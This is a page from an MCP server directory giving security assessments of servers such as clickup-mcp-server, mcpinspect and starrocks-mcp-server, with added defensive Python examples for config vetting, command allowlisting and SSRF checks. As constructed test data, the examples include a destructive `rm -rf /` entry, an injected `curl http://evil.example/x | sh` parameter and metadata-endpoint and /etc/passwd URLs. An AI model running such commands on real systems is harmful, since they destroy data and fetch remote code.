Stop Searching. Start Trusting.

The curated directory of MCP servers, vetted for security, efficiency, and quality.

Tired of the MCP "Marketplace" Chaos?

We built MCPScout.ai to solve the ecosystem's biggest pain points.

No Insecure Dumps

We manually analyze every server for basic security flaws.

Easy Setup

Our gotcha notes warn you about complex setups.

Avoid "Token Hogs"

We estimate token costs for cost-effective agents.

Products, Not Demos

We filter out "Hello World" demos.


Vetted Servers(8554)

Low Cost

clickup-mcp-server

by Chisanan232

Sec6

Facilitates AI-enabled applications interacting with the ClickUp API through a standardized Model Context Protocol (MCP) server.

Setup Requirements

  • ⚠️Requires Python 3.13 or higher.
  • ⚠️A ClickUp API Token is mandatory for server operation and must be provided via `--token` or the `CLICKUP_API_TOKEN` environment variable.
  • ⚠️The default CORS policy and lack of webhook signature validation make it insecure for public deployment without careful configuration changes.
  • ⚠️If the `QUEUE_BACKEND` environment variable is set to anything other than `local`, an external message queue infrastructure (e.g., Kafka, Redis) will be required.
Verified Safe
The server uses `SecretStr` for API tokens and retrieves them from environment variables or .env files, which is good practice. However, the default CORS configuration allows all origins (`*`) and credentials (`true`), which is a significant security risk if the server is publicly exposed without adjusting these settings. Additionally, the webhook ingress endpoint (`/webhook/clickup`) appears to lack explicit signature verification for incoming payloads, making it vulnerable to spoofed events. For production deployment, strict CORS policies and webhook signature validation are critical to implement.
Updated: 2026-01-15 (source: GitHub)
Low Cost

mcpinspect

by MatMercer

Sec6

A CLI tool to inspect MCP (Model Context Protocol) servers configured for Claude Code.

Setup Requirements

  • ⚠️Requires macOS (due to keychain integration and explicit support statement)
  • ⚠️Requires a `~/.claude.json` configuration file with MCP servers defined
  • ⚠️Authentication to HTTP/SSE MCP servers relies on OAuth tokens being present in the macOS keychain, saved by Claude Code.
Verified Safe
The `stdio` server type executes commands and arguments taken directly from the `.claude.json` configuration file via `exec.CommandContext`. If that file is compromised or contains a malicious entry (e.g., a `stdio` server with `command: "rm", args: ["-rf", "/"]`), running `mcpinspect <server-name>` against that entry executes the command. The tool correctly reads OAuth tokens from the macOS keychain rather than hardcoding them, which is good security practice. However, directly executing user-defined commands for `stdio` servers is a significant risk whenever the configuration file cannot be trusted, for example because other users or processes can write to it.
Updated: 2025-11-22 (source: GitHub)
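A pre-flight check of the kind a practitioner would want before letting a tool launch whatever a config file names. This is an added example in Python, not code from mcpinspect (which is written in Go): the `mcpServers` map layout, the launcher allowlist, and the sample entries are assumptions and constructed data.

```python
"""Added example, not code from mcpinspect: vet the stdio entries of a
Claude Code style configuration before anything is executed. The config
layout below (an "mcpServers" map) and the allowlist are assumptions."""
import json
import os
import shlex
import stat

# Assumption: site policy permits only these launcher binaries for stdio servers.
ALLOWED_COMMANDS = frozenset({"npx", "uvx", "node", "python3", "docker"})


def render_invocation(server: dict) -> str:
    """Show exactly what exec.CommandContext-style execution would run (dry run)."""
    return shlex.join([server.get("command", "")] + list(server.get("args", [])))


def vet_stdio_servers(config_text: str, allowed: frozenset[str] = ALLOWED_COMMANDS) -> list[str]:
    """Return one finding per suspicious stdio entry; an empty list means clean."""
    findings: list[str] = []
    cfg = json.loads(config_text)
    for name, server in cfg.get("mcpServers", {}).items():
        if server.get("type", "stdio") != "stdio":
            continue  # http/sse entries launch nothing locally
        command = server.get("command", "")
        args = server.get("args", [])
        if not command:
            findings.append(f"{name}: stdio server without a command")
            continue
        if not isinstance(args, list) or not all(isinstance(a, str) for a in args):
            findings.append(f"{name}: args must be a list of strings")
            continue
        if os.path.basename(command) not in allowed:
            findings.append(f"{name}: command not in allowlist, would run: {render_invocation(server)}")
        if "/" in command and not os.path.isabs(command):
            findings.append(f"{name}: relative path {command!r} depends on the working directory")
    return findings


def assess_mode(st_mode: int) -> list[str]:
    """Flag a config file that other users or processes could edit."""
    findings = []
    if st_mode & stat.S_IWGRP:
        findings.append("config is group-writable")
    if st_mode & stat.S_IWOTH:
        findings.append("config is world-writable")
    return findings


def check_config_file(path: str) -> list[str]:
    """Filesystem check for the real file; combine with vet_stdio_servers."""
    st = os.stat(path)
    findings = assess_mode(st.st_mode)
    if hasattr(os, "geteuid") and st.st_uid != os.geteuid():
        findings.append("config is not owned by the current user")
    return findings


# Constructed sample config: a benign entry, the malicious entry the analysis
# describes, and a remote entry that launches nothing.
SAMPLE_CONFIG = json.dumps({
    "mcpServers": {
        "files": {"type": "stdio", "command": "npx", "args": ["-y", "@example/mcp-server", "/tmp"]},
        "wiper": {"type": "stdio", "command": "rm", "args": ["-rf", "/"]},
        "remote": {"type": "http", "url": "https://mcp.example/sse"},
    }
})


if __name__ == "__main__":
    for line in vet_stdio_servers(SAMPLE_CONFIG):
        print("WARN", line)
```

The allowlist compares only the basename, so a malicious entry pointing at `/tmp/npx` would pass; tighten to absolute paths of known-good binaries where the environment permits. `exec.CommandContext` does not invoke a shell, so the danger here is the choice of binary and arguments, not shell metacharacters.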
Medium Cost

uspto_fpd_mcp

by john-walkoe

Sec9

Facilitates research and analysis of USPTO Final Petition Decisions, including search, detail retrieval, and document content extraction.

Setup Requirements

  • ⚠️Requires USPTO_API_KEY (paid) for core functionality. API key format is specific (30 lowercase letters).
  • ⚠️Optional MISTRAL_API_KEY (paid, ~$0.001/page) is required for OCR of scanned documents; without it, only free PyPDF2 extraction for text-based PDFs is available.
  • ⚠️Many advanced features and cross-MCP workflows require the Patent File Wrapper (PFW) MCP to be installed and running, acting as a centralized proxy and data source.
Verified Safe
The server demonstrates a strong commitment to security: API keys are stored securely using Windows DPAPI (or environment variables as fallback), all log output is automatically sanitized to prevent sensitive data leakage (CWE-532), and security events are explicitly logged. Network resilience features like circuit breakers, rate limiting, and connection pooling are implemented. The proxy server includes web security headers and request size limits. While a legacy hardcoded entropy for DPAPI decryption exists, it's explicitly documented as a backward compatibility measure with a migration path to a more secure, cryptographically random entropy.
Updated: 2026-01-19 (source: GitHub)
Medium Cost

foundry-vtt-mcp

by adambdooley

Sec8

Connects Foundry VTT to Claude Desktop for AI-powered campaign management, character/compendium queries, content creation, and AI map generation.

Setup Requirements

  • ⚠️Requires Foundry VTT v13 and Claude Desktop with an active Claude Pro/Max plan for Model Context Protocol (MCP) access.
  • ⚠️Map generation requires a dedicated GPU with at least 8GB of VRAM. On macOS, this specifically requires an Apple Silicon (M1/M2/M3/M4) Mac.
  • ⚠️Manual installation requires Node.js version 18 or higher.
Verified Safe
The server architecture is designed with security in mind, employing a registry pattern and Zod schemas for input validation. Critical operations, such as character data extraction and content creation, are restricted to Game Master (GM) users in Foundry VTT, with additional configurable permissions for write operations ('Allow Write Operations' setting). The use of `execSync` and `spawn` for process execution is isolated to installation scripts (e.g., for Python/ComfyUI) and internal backend management (e.g., spawning the ComfyUI service), rather than processing arbitrary user input. No direct `eval` of user input is observed. Network communication uses WebSocket and WebRTC, typical for such applications. There are no obvious hardcoded API keys or sensitive credentials exposed. The biggest remaining risks would be a vulnerability in the underlying Foundry VTT API itself, or an undiscovered injection vector in the prompt processing that could bypass validation and lead to unintended system commands, though the current code mitigates this by abstracting actions through specific tools. MCP access also requires the user's Claude Pro/Max plan; this is a licensing requirement, not a security control.
Updated: 2026-01-04 (source: GitHub)
Medium Cost
Sec7

Provides a set of Model Context Protocol (MCP) tools for interacting with and managing various AI/ML resources (models, datasets, code, dataflows, evaluations, spaces, inferences) on the CSGHub platform, primarily for use by LLM agents.

Setup Requirements

  • ⚠️Requires Python 3.10 or higher.
  • ⚠️Requires a CSGHub account and a valid API access token ('token' parameter is mandatory for most functions).
  • ⚠️Requires `CSGHUB_SERVER_ENDPOINT` and `CSGHUB_WEB_ENDPOINT` environment variables to be correctly set, pointing to the CSGHub API and web interfaces. Depending on the specific server module (e.g., dataset, finetune, inference, space), `CSGHUB_ISSUE_ENDPOINT` and `CLUSTER_ID` environment variables may also be required.
  • ⚠️The server defaults to listening on '0.0.0.0:8000', which means it will be accessible on all network interfaces. This necessitates careful network configuration (e.g., firewalls, reverse proxies) in production deployments.
Verified Safe
The codebase avoids direct use of dangerous functions like 'eval' or 'exec'. API endpoints and critical configuration values are retrieved from environment variables, which is a good practice to prevent hardcoded secrets. Access tokens are passed via 'Authorization: Bearer' headers for API calls. However, several modules default to binding the MCP server to '0.0.0.0:8000', which means it will listen on all network interfaces; this poses a security risk if deployed in a public-facing environment without proper firewalling or a reverse proxy. Additionally, error responses may return the raw upstream API error messages, potentially exposing internal details.
Updated: 2026-01-14 (source: GitHub)
Medium Cost

starrocks-mcp-server

by tracymacding

Sec3

Provides AI clients with intelligent diagnostic and analysis capabilities for StarRocks database instances.

Setup Requirements

  • ⚠️Node.js >= 18.0.0 is a strict requirement.
  • ⚠️Requires an external 'StarRocks Expert' Central API server to be running and accessible.
  • ⚠️Requires SSH access (user, key path, potentially password) to StarRocks cluster nodes for advanced diagnostic features like log fetching.
Review Required
The server acts as a proxy to execute SQL queries, Prometheus queries, local CLI commands, and remote SSH commands. The commands and queries are orchestrated by an external 'StarRocks Expert' Central API. A critical security risk exists if the Central API is compromised, as the MCP server will directly execute arbitrary shell commands received from it, both locally and remotely via SSH. This makes the server highly vulnerable to remote code execution if the Central API is not fully trusted and secured. Sensitive information is masked in logs but not during execution of commands.
Updated: 2026-01-16 (source: GitHub)
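The fix for the risk described above is to stop accepting command strings from the control plane and accept structured actions that the MCP server itself maps to a fixed argv. This is an added example in Python, not code from starrocks-mcp-server (which is Node.js): the request shape, the action names, the log paths and the parameter rules are assumptions, and the requests are constructed.

```python
"""Added example, not code from starrocks-mcp-server: replace "execute the
shell string the Central API sends" with a structured action that maps to
a fixed argv. Action names, paths and parameter rules are assumptions."""
import re
import shlex

# Assumption: the control plane sends {"action": ..., "params": {...}} and the
# MCP server, not the control plane, owns the list of things it is willing to run.
ACTIONS: dict[str, dict] = {
    "tail_log": {
        "argv": ["tail", "-n", "{lines}", "/var/log/starrocks/{component}.log"],
        "params": {
            "lines": re.compile(r"[1-9][0-9]{0,3}"),  # 1..9999 lines
            "component": re.compile(r"fe|be|cn"),    # fixed component names
        },
    },
    "disk_usage": {"argv": ["df", "-h", "/data"], "params": {}},
}


class RejectedCommand(ValueError):
    """Raised for anything outside the fixed action set."""


def build_argv(request: dict) -> list[str]:
    """Validate a control-plane request and return the exact argv to run."""
    spec = ACTIONS.get(request.get("action"))
    if spec is None:
        raise RejectedCommand(f"unknown action {request.get('action')!r}")
    params = request.get("params", {})
    if set(params) != set(spec["params"]):
        raise RejectedCommand("parameter set does not match the action")
    for key, value in params.items():
        if not isinstance(value, str) or not spec["params"][key].fullmatch(value):
            raise RejectedCommand(f"parameter {key!r} failed validation")
    return [piece.format(**params) for piece in spec["argv"]]


def is_rejected(request: dict) -> bool:
    """Convenience wrapper: True when the request would not be executed."""
    try:
        build_argv(request)
    except RejectedCommand:
        return True
    return False


def build_ssh_argv(user: str, host: str, key_path: str, remote_argv: list[str]) -> list[str]:
    """Run the vetted argv on a cluster node. The remote sshd hands the command
    to a shell, so every element is quoted with shlex before transport."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]{0,31}", user) or not re.fullmatch(r"[A-Za-z0-9.-]+", host):
        raise RejectedCommand("bad user or host")
    return ["ssh", "-i", key_path, "-o", "BatchMode=yes", f"{user}@{host}", shlex.join(remote_argv)]


# Constructed requests: one legitimate, two as a compromised control plane might send.
GOOD_REQUEST = {"action": "tail_log", "params": {"lines": "200", "component": "fe"}}
INJECTED_REQUEST = {"action": "tail_log",
                    "params": {"lines": "200", "component": "fe; curl http://evil.example/x | sh"}}
RAW_SHELL_REQUEST = {"action": "shell", "params": {"cmd": "rm -rf /data"}}

if __name__ == "__main__":
    print(build_ssh_argv("starrocks", "be-01.example", "/etc/keys/sr", build_argv(GOOD_REQUEST)))
    for req in (INJECTED_REQUEST, RAW_SHELL_REQUEST):
        print("rejected:", is_rejected(req))
```

The same pattern applies to the SQL and Prometheus paths: accept a named query plus validated parameters rather than query text. Authenticating the Central API (mutual TLS or signed requests) is still necessary, but with fixed actions a compromised control plane can only choose among operations the operator already approved.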
Medium Cost

argus-mcp

by dykeruv

Sec9

AI-powered code review and quality enhancement for multiple programming languages and environments.

Setup Requirements

  • ⚠️Requires Python 3.8 or higher.
  • ⚠️Requires one or more paid API keys (GLM_API_KEY, OPENROUTER_API_KEY) from z.ai or OpenRouter.
Verified Safe
The server demonstrates strong security awareness by explicitly enforcing API key protection via environment variables and providing clear guidelines in `SECURITY.md`. Input validation is present, and file paths are sanitized. The core logic uses static code analysis (AST parsing) and sends code to external AI models for review, rather than executing user-provided code locally, which mitigates many direct execution risks. The server's design as a local stdin/stdout tool minimizes external network attack surface. External dependencies (AI providers) are an inherent risk but are managed with retries and fallbacks.
Updated: 2026-01-19 (source: GitHub)
Medium Cost

Network-Query-Tool

by marksplayzc

Sec9

A web-based network diagnostic tool for performing WHOIS, DNS lookups, IP information, ping, traceroute, and other network health checks.

Setup Requirements

  • ⚠️Requires a PHP-enabled web server (e.g., Apache, Nginx with PHP-FPM)
  • ⚠️Requires PHP 'zlib' extension for optimal gzip compression
  • ⚠️Server requires outbound internet access on ports like 43 (WHOIS) and 53 (DNS) for full functionality
Verified Safe
The source code demonstrates strong security practices for a PHP web application. It includes robust security headers (e.g., Strict-Transport-Security, X-Frame-Options, Content-Security-Policy with nonce), enforces HTTPS redirection, uses `htmlspecialchars()` for output encoding to prevent XSS, and `filter_var()` for input validation. Dangerous functions like `eval()` or direct shell command execution (`exec`, `shell_exec`) are not present. Network operations (WHOIS, DNS, ASN lookup) are performed using standard PHP functions (`fsockopen`, `gethostbyaddr`, `dns_get_record`) which are generally safe when inputs are validated. The 'ip.php' file is intentionally empty. The primary 'risk' is inherent to any tool performing network queries, requiring outbound internet access, but the implementation itself appears secure.
Updated: 2025-12-11 (source: GitHub)
Low Cost

mcp

by visa

Sec9

Provides a Node.js/TypeScript client for AI agents to securely integrate with Visa's Model Context Protocol (MCP) server, enabling token-managed authentication and execution of agent-driven commerce transactions.

Setup Requirements

  • ⚠️Requires Node.js >= 18.0.0
  • ⚠️Requires extensive Visa API credentials (VIC, VTS, MLE certificates) obtained through Visa Intelligent Commerce and VTS onboarding processes.
  • ⚠️Requires a user-generated RSA private key for JWT signing.
Verified Safe
The project reads all sensitive credentials (API keys, private keys, certificates) from environment variables, uses the well-established 'jose' library for JWE/JWT cryptographic operations, and validates inputs with 'zod'. These practices give an integration client a high security posture. No 'eval' or obvious malicious patterns were found. Because everything sensitive arrives through the environment, secure management of those variables (restricted process environment, no logging of `process.env`, secrets injected at runtime rather than committed) is crucial for overall security.
Updated: 2025-12-05 (source: GitHub)
Medium Cost

float-mcp

by asachs01

Sec9

Provides a Model Context Protocol (MCP) server for Float.com, enabling AI assistants to manage project management, resource allocation, time tracking, and team coordination.

Setup Requirements

  • ⚠️Requires a Float.com account with API access and a valid API key (potentially a paid service).
  • ⚠️Requires Node.js 22.0.0 or later (for local installation).
  • ⚠️Docker is recommended for deployment and often used in MCP client configurations.
Verified Safe
The server securely retrieves the Float API key from environment variables (FLOAT_API_KEY) and implements robust error handling, including rate limiting with exponential backoff. There are no signs of 'eval' or code obfuscation. A minor point is deducted for the 'test-api-key' default in development config, though it's correctly overridden in non-test environments.
Updated: 2025-11-27 (source: GitHub)
Medium Cost

mcp-bash-framework

by yaniv-golan

Sec9

A Bash-based framework for building and running Model Context Protocol (MCP) servers, enabling the creation of custom AI-integrable tools, resources, prompts, and completions.

Setup Requirements

  • ⚠️Requires 'jq' or 'gojq' for full functionality (minimal mode available without it).
  • ⚠️Requires Bash 3.2+ for core features.
  • ⚠️External tools like 'git', 'curl', 'openssl', or domain-specific binaries may be required depending on resource/tool implementations.
Verified Safe
The framework demonstrates a high commitment to security, especially for a Bash environment. It features robust environment isolation for subprocesses (tools, providers) to prevent information leakage and privilege escalation. Extensive path validation and root containment checks guard against path traversal. Project-level shell scripts (hooks) are subject to strict ownership and permission checks, mitigating local privilege escalation risks. Input is sanitized, heavily relying on 'jq'/'gojq' for JSON processing to reduce shell injection risks. Remote authentication with constant-time token comparison helps secure proxied deployments. Network policy functions aid in preventing Server-Side Request Forgery (SSRF). 'eval' is explicitly avoided in critical path operations.
Updated: 2026-01-19 (source: GitHub)
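What an outbound "network policy" check against SSRF, of the kind the analysis credits the framework with, looks like in practice. This is an added example in Python, not code from mcp-bash-framework: the resolver is injected so the example runs offline, and the hostnames and addresses in `FAKE_DNS` are constructed.

```python
"""Added example, not code from mcp-bash-framework: an outbound network
policy check against SSRF. The resolver is injected so the example runs
offline; the hostnames and addresses in FAKE_DNS are constructed."""
import ipaddress
from typing import Callable
from urllib.parse import urlsplit

Resolver = Callable[[str], list[str]]

# Constructed DNS table standing in for socket.getaddrinfo.
FAKE_DNS: dict[str, list[str]] = {
    "api.example": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],        # cloud metadata endpoint
    "rebind.example": ["93.184.216.34", "10.0.0.5"],  # one public, one internal answer
}


def fake_resolve(host: str) -> list[str]:
    """Offline stand-in for DNS resolution."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise OSError(f"cannot resolve {host}") from None


def is_public_address(ip_text: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return addr.is_global and not addr.is_multicast


def check_outbound_url(url: str, resolve: Resolver,
                       allowed_hosts: frozenset[str] = frozenset()) -> tuple[bool, str]:
    """Return (allowed, reason). Every address the host resolves to must be public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if allowed_hosts and host not in allowed_hosts:
        return False, f"host {host!r} not in allowlist"
    try:
        ipaddress.ip_address(host)
        addresses = [host]  # literal IP, nothing to resolve
    except ValueError:
        try:
            addresses = resolve(host)
        except OSError as exc:
            return False, str(exc)
    for ip_text in addresses:
        if not is_public_address(ip_text):
            return False, f"{host} resolves to non-public address {ip_text}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://api.example/v1/items", "http://metadata.internal/latest/meta-data/",
                      "http://127.0.0.1:8080/admin", "http://[::ffff:169.254.169.254]/",
                      "file:///etc/passwd", "https://rebind.example/"):
        print(candidate, "->", check_outbound_url(candidate, fake_resolve))
```

Two caveats a practitioner will want: connect to the address that passed the check (pin it) rather than letting the HTTP client resolve the name again, or a rebinding attacker can return a public address for the check and an internal one for the connection; and apply the check to every redirect target, not only the initial URL.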
Medium Cost

n7m-mcp

by jonpspri

Sec9

Provides AI assistants with geocoding, reverse geocoding, and OpenStreetMap object lookup capabilities via the Model Context Protocol.

Setup Requirements

  • ⚠️Requires Python 3.12 or newer.
  • ⚠️Relies on external Nominatim API, subject to its fair use policy (1 request per second).
  • ⚠️Requires `uvx` for the fastest setup as an MCP server, or `uv` for local development.
Verified Safe
The server uses `httpx` for external API calls to Nominatim, and internally enforces Nominatim's rate limit of 1 request per second. Input parameters are type-hinted and validated using Pydantic models for API responses. No `eval` or obvious obfuscation found. Environment variables are used for configuration, preventing hardcoded secrets. The HTTP client instance is managed correctly for async operations. The primary external dependency is OpenStreetMap's Nominatim service.
Updated: 2025-11-23 (source: GitHub)
Page 159 of 713